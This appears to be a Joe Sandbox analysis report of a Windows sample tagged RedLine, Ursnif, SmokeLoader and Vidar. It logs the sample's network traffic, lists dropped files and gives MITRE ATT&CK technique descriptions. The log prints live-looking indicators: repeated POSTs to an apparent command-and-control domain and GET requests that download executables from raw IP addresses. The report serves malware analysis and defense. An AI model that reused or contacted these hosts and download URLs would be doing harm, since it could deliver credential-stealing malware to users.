Source: global traffic	HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /deadftx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.meCookie: stel_ssid=e3796f8cc611f4f1d7_654119648794384800
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://debvplifcf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kpswfp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sdins.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://auypktwjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ebvtwkfux.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hqmym.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://datryh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ajpfnqvlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sxihacbmgi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://upkkyf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hgusiwjl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ulciihlbw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bjtfrvl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vvydl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jtmdotimkr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: GET /mia/solt.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.56.146.168
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gsqxoged.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ahgwjjm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://efngjyqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ukkwrl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 321Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ebaxoe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://eqghptenl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ptpfdpcirh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etebl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aexqt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://aehnv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: GET /1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 89.208.107.216
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fbybhia.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 129Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fhkewyoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mqfbhqf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 161Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://acxiqgb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xawdohy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uvlvsvw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jorxt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://syohyc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: o36fafs3sn6xou.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cbmlqnw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: o36fafs3sn6xou.com

Source: Joe Sandbox View	ASN Name: ITOOLS-ASiToolsJSCMN ITOOLS-ASiToolsJSCMN
Source: Joe Sandbox View	ASN Name: UTA-ASAT UTA-ASAT

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168
Source: unknown	TCP traffic detected without corresponding DNS query: 193.56.146.168

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report S2XJ2wbz7u.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: RedLine

Threatname: Ursnif

Threatname: SmokeLoader

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\41479232570897308364731578

C:\ProgramData\41578002959771932956378793

C:\ProgramData\42863426655515339578900088

C:\ProgramData\84206842141166370440363339

C:\ProgramData\94088433411392910584223625

C:\ProgramData\95786452850497366982696300

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\wpiq[1].zip

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe

Windows Analysis Report
S2XJ2wbz7u.exe

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre